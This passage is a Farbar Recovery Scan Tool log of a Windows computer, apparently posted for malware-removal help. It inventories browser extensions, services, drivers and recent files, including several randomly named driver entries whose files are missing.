CHR Extension: (Proxy SwitchyOmega) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\padekgcemlokbadohgkifijomclgjgif [2020-12-20]
CHR Extension: (Cold Turkey Blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\pganeibhckoanndahmnfggfoeofncnii [2023-11-17]
CHR HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera:
=======
OPR Profile: C:\Users\John\AppData\Roaming\Opera Software\Opera Stable [2023-11-23]
OPR DownloadDir: I:\stahovanie
OPR Notifications: Opera Stable -> hxxps://aternos.org; hxxps://forum24.os.tc; hxxps://mail.google.com; hxxps://meet.google.com; hxxps://opencsgo.com; hxxps://skinodds.com; hxxps://www.pvpro.com; hxxps://www.tipsport.sk
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Custom Page Zoom) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\acfbkfekhjlboehfjgdidogogpbklcdm [2023-08-18]
OPR Extension: (AdNauseam) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\dklmdhmkdbinnceekhecifmjhiiabolp [2023-10-31]
OPR Extension: (Rich Hints Agent) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2023-10-17]
OPR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gjpihpkhgfngnbhhfdehlcmgfahbciip [2022-07-26]
OPR Extension: (Opera Wallet) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2023-11-10]
OPR Extension: (Twitch Now) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiahmjdojdodmjjhhddegdnhcpjmokmo [2021-06-20]
OPR Extension: (Scripter) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hpochgedhgonjnpbepkbnkkibkjigknc [2021-09-08]
OPR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2021-11-03]
OPR Extension: (Deezer™ Downloader (Deezloader)) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jnmflndddcmkajmkoahaenmnfbdckaom [2022-02-28]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-08-14]
OPR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-20]
StartMenuInternet: (HKLM) Opera GXStable - C:\Program Files\Opera GX\Launcher.exe

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2022-09-26] (Adobe Inc. -> Adobe Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
S4 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 apacheds-default; C:\Program Files (x86)\ApacheDS\bin\wrapper.exe [204800 2020-02-28] () [File not signed]
S4 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [8477080 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [621728 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Tools; C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe [351848 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 AvastSecureBrowserElevationService; C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\elevation_service.exe [1136920 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S4 CDROM_Detect; C:\Program Files\4G LTE Modem\4G_Server.exe [327680 2016-11-19] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-05-30] (Disc Soft Ltd -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-04-16] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-06] (Epic Games Inc. -> Epic Games, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [206304 2021-03-31] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 ewserver; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe [191664 2018-02-26] (Trace Software International -> )
S4 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [20756320 2020-05-01] (FACE IT LIMITED -> )
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [82216 2021-02-17] (Mixbyte Inc -> Freemake)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
S4 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S4 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-03-30] (Logitech Inc -> Logitech Inc.)
S4 memcached; c:\memcached\memcached.exe [507640 2009-12-16] () [File not signed]
S4 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
S4 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [100672 2020-04-17] (ProtonVPN AG -> )
S4 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-04-17] (ProtonVPN AG -> )
S4 QMEmulatorService; D:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe [166384 2019-12-20] (Tencent Technology(Shenzhen) Company Limited -> Tencent)
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] (Razer USA Ltd. -> )
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2022-02-02] (Rockstar Games, Inc. -> Rockstar Games) [File not signed]
R2 SbieSvc; D:\windows programy\Sandboxie-Plus\SbieSvc.exe [363992 2022-08-29] (Tonalio GmbH -> Sandboxie-Plus.com)
R2 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-05-27] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [613056 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R2 Synology Drive VSS Service x64; C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe [370824 2022-03-29] (Synology Inc. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [18035512 2023-10-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe [7099632 2021-07-21] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2020-11-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S2 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15477208 2020-03-07] (VMware, Inc. -> )
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation -> Microsoft Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S4 wampapache64; c:\wamp64\bin\apache\apache2.4.33\bin\httpd.exe [30720 2018-03-18] (Apache Software Foundation) [File not signed]
S4 wampmariadb64; c:\wamp64\bin\mariadb\mariadb10.2.14\bin\mysqld.exe [14550440 2018-03-26] (MariaDB Corporation Ab -> )
S4 wampmysqld64; c:\wamp64\bin\mysql\mysql5.7.21\bin\mysqld.exe [39551488 2017-12-28] () [File not signed]
R2 WebDriveService; C:\Program Files\WebDrive\wdService.exe [12388232 2019-12-20] (South River Technologies -> South River Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [7531208 2021-08-01] (PUBG CORPORATION -> PUBG Corporation)
S2 IpOverUsbSvc; "C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe" [X]
S2 SWVisualize2018.BoostService; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe" [X]
S2 SWVisualize2018.Queue.Server; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 amdkmdap; C:\Windows\System32\Drivers\amdkmdap.sys [614280 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [140032 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [424192 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [36792 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [208672 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [332880 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [247888 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [97360 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42424 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [176384 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [522480 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2020-04-15] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [108928 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84496 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851256 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [469472 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [216984 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [326064 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [58368 2009-06-02] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 CMUAC; C:\Windows\System32\DRIVERS\Headset6400x1.SYS [386560 2013-10-03] (C-MEDIA ELECTRONICS INC. -> A4Tech Inc.)
S3 CT_QUALCOMM_U_drv; C:\Windows\System32\DRIVERS\CT_QUALCOMM_U_drv.sys [118016 2009-04-27] (Microsoft Windows Hardware Compatibility Publisher -> QUALCOMM Incorporated)
R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [31576 2020-04-24] (DEV47 APPS -> Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 EuMusDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\vrtaucbl.sys [66728 2016-07-05] (NTONYX Ltd. -> Eugene V. Muzychenko)
R0 FACEIT; C:\Windows\System32\Drivers\FACEIT.sys [20193656 2020-05-01] (FACE IT LIMITED -> )
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [32384 2018-05-03] (Sony Mobile Communications AB -> Sony Mobile Communications)
R1 gvm; C:\Windows\System32\DRIVERS\gvm.sys [393712 2020-09-22] (Google LLC -> Google LLC)
S3 HidNt; C:\Windows\System32\DRIVERS\HIDNt.sys [22576 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 HidNt; C:\Windows\SysWOW64\DRIVERS\HIDNt.sys [18992 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 KProcessHacker3; C:\Program Files\Process Hacker 2\kprocesshacker.sys [45208 2016-03-29] (Wen Jia Liu -> wj32)
R2 LdBoxDrv; C:\Program Files\dnplayerext2\LdBoxDrv.sys [319376 2020-06-18] (Shanghai Changzhi Network Technology Co., Ltd. -> Oracle Corporation)
R3 LGBusEnum; C:\Windows\System32\drivers\LGBusEnum.sys [37408 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 LGVirHid; C:\Windows\System32\drivers\LGVirHid.sys [26912 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2018-07-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-27] (Visicom Media Inc. -> Visicom Media Inc.)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc. -> Visicom Media Inc.)
S3 navagio; C:\Program Files\Common Files\PUBG\navagio.sys [3632840 2021-08-03] (PUBG CORPORATION -> )
R1 npcap; C:\Windows\System32\DRIVERS\npcap.sys [69432 2019-09-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win7\ProtonVPN.SplitTunnelDriver.sys [22456 2020-01-15] (ProtonVPN AG -> Proton Technologies AG)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-06-22] (Corel Corporation -> Corel Corporation)
S4 RsFx0310; C:\Windows\System32\DRIVERS\RsFx0310.sys [249024 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [7947096 2019-05-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [51224 2016-05-12] (Razer USA Ltd. -> Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer Inc. -> Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-07] (Razer Inc. -> Razer, Inc.)
R3 SbieDrv; D:\windows programy\Sandboxie-Plus\SbieDrv.sys [249368 2022-08-29] (Microsoft Windows Hardware Compatibility Publisher -> Sandboxie-Plus.com)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [40664 2015-02-03] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39864 2020-04-06] (ProtonVPN AG -> The OpenVPN Project)
R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmauxvaio64_win7.sys [41192 2019-01-06] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBAudioVMVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmvaio64_win7.sys [41192 2019-01-05] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-06-28] (Oracle Corporation -> Oracle Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R1 vmkbd3; C:\Windows\System32\DRIVERS\vmkbd.sys [52288 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\System32\DRIVERS\vmnetbridge.sys [66368 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R3 VOICEMOD_Driver; C:\Windows\System32\drivers\vmdrv.sys [31744 2021-12-28] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103736 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO -> MBB)
R2 WebDriveFSD; C:\Program Files\WebDrive\wdfsd.sys [108960 2018-09-25] (South River Technologies -> South River Technologies, Inc.)
R3 wovad_micarray; C:\Windows\System32\drivers\womic.sys [35696 2017-11-25] (Beijing Wolicheng Technology Co., Ltd. -> Windows (R) Win 7 DDK provider)
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 glavcam; system32\DRIVERS\glavcam.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-23 19:29 - 2023-11-23 19:29 - 002383872 _____ (Farbar) C:\Users\John\Downloads\FRST64.exe
2023-11-23 19:27 - 2023-11-23 19:27 - 000000021 _____ C:\Users\John\Desktop\forum viry ucet.txt
2023-11-22 15:23 - 2023-11-22 15:23 - 012383864 _____ (Tim Kosse) C:\Users\John\Downloads\FileZilla_3.66.1_win64-setup.exe
2023-11-22 03:28 - 2023-11-22 03:28 - 000000089 _____ C:\Users\John\Desktop\txt.txt
2023-11-20 22:32 - 2023-11-22 11:41 - 000000131 _____ C:\Users\John\Desktop\praxe chill.txt
2023-11-18 21:58 - 2023-11-18 21:58 - 000731283 _____ C:\Users\John\Downloads\F3-BP-2015-Skrivan-Jaroslav-Bakalarka.pdf
2023-11-18 21:55 - 2023-11-18 21:55 - 000051947 _____ C:\Users\John\Downloads\white-paper-php-performance-checklist.pdf
2023-11-18 21:02 - 2023-11-18 21:02 - 001282692 _____ C:\Users\John\Downloads\Server-Side_Lookup_Optimization_of_A_Web_Service.pdf
2023-11-16 18:50 - 2023-11-16 18:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-Link
2023-11-16 18:49 - 2023-11-16 18:49 - 000000000 ____D C:\Program Files (x86)\TP-Link
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 001185504 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\Rtlihvs.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000114920 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\RtlExtUI.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000049384 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\system32\rtlCoInst.dll
2023-11-16 18:48 - 2023-11-16 18:49 - 000000000 ____D C:\Users\John\AppData\Local\TP-Link
2023-11-16 18:48 - 2023-11-16 18:48 - 000000000 ____D C:\ProgramData\TP-Link
2023-11-15 08:15 - 2023-11-14 14:28 - 000587065 _____ C:\Users\John\cviko2_231004.ipynb
2023-11-15 08:15 - 2023-11-14 14:28 - 000447921 _____ C:\Users\John\cviko231018.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000629594 _____ C:\Users\John\cviko20231108.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000317529 _____ C:\Users\John\Untitled1.ipynb
2023-11-13 17:48 - 2023-11-13 17:48 - 000001366 _____ C:\Users\John\Desktop\team1 laravel.ffs_gui
2023-11-11 15:50 - 2023-11-11 15:50 - 000000000 ____D C:\Users\John\.mputils
2023-11-10 09:40 - 2023-11-10 09:40 - 000262144 _____ C:\Windows\Minidump\111023-100277-01.dmp
2023-11-07 01:17 - 2023-11-07 01:17 - 000001057 _____ C:\Users\John\Desktop\WinHugs.lnk
2023-11-07 01:17 - 2023-11-07 01:17 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinHugs
2023-11-07 01:15 - 2023-11-07 01:17 - 000000000 ____D C:\Program Files (x86)\WinHugs
2023-11-03 17:27 - 2023-11-03 17:27 - 000002468 _____ C:\Users\John\Desktop\moje upraveny arduno.txt
2023-11-03 12:46 - 2023-11-03 12:21 - 000006143 _____ C:\HTTPClient.cpp
2023-11-03 12:46 - 2023-10-31 21:58 - 000001218 _____ C:\HTTPClient.h
2023-11-03 12:46 - 2023-10-26 13:56 - 000001987 _____ C:\wifly_http.ino
2023-11-03 12:46 - 2023-10-26 13:56 - 000000182 _____ C:\Debug.h
2023-11-02 03:24 - 2023-11-02 03:24 - 003243838 _____ C:\Users\John\Desktop\lol ucet.psd
2023-11-01 13:36 - 2023-11-01 13:36 - 000000339 _____ C:\Users\John\Desktop\nove regexy pre opgg.txt
2023-10-26 19:17 - 2023-10-26 19:23 - 000000000 ____D C:\Users\John\AppData\Local\playit_gg
2023-10-26 19:17 - 2023-10-26 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playit.gg
2023-10-26 13:50 - 2023-11-09 09:37 - 000000000 ____D C:\Users\John\AppData\Local\Arduino15
2023-10-26 13:50 - 2023-10-26 13:57 - 000000000 ____D C:\Users\John\Documents\Arduino
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\Users\Public\Desktop\Arduino.lnk
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-23 19:50 - 2018-05-27 13:28 - 000047522 _____ C:\Users\John\Downloads\FRST.txt
2023-11-23 19:50 - 2017-02-03 15:18 - 000000000 ____D C:\FRST
2023-11-23 19:41 - 2020-07-28 11:17 - 000000000 ____D C:\Users\John\AppData\Local\Discord
2023-11-23 19:32 - 2016-06-05 17:45 - 000000000 ____D C:\Users\John\AppData\Roaming\TS3Client
2023-11-23 18:10 - 2022-09-30 08:56 - 000000000 ____D C:\Users\John\AppData\Roaming\superProductivity
2023-11-23 15:35 - 2018-06-28 19:47 - 000000000 ____D C:\Users\John\AppData\Local\LogMeIn Hamachi
2023-11-23 11:58 - 2017-02-21 16:47 - 000000000 ____D C:\Users\John\AppData\Roaming\obs-studio
2023-11-23 11:40 - 2018-07-28 23:15 - 000000000 ____D C:\Users\John\AppData\Roaming\discord
2023-11-23 10:41 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2023-11-23 10:41 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2023-11-23 10:36 - 2020-04-15 23:16 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-11-23 10:36 - 2009-07-14 06:13 - 001061310 _____ C:\Windows\system32\PerfStringBackup.INI
2023-11-23 10:36 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2023-11-23 10:35 - 2017-06-12 11:10 - 000000000 ____D C:\ProgramData\VMware
2023-11-23 10:35 - 2016-06-04 15:16 - 000000000 ____D C:\Program Files (x86)\Google
2023-11-23 10:32 - 2021-07-29 08:59 - 000000400 __RSH C:\ProgramData\ntuser.pol
2023-11-23 10:31 - 2020-11-29 22:35 - 000000000 ____D C:\ProgramData\VirtualBox
2023-11-23 10:31 - 2019-02-03 09:09 - 000000000 ____D C:\Program Files (x86)\TeamViewer
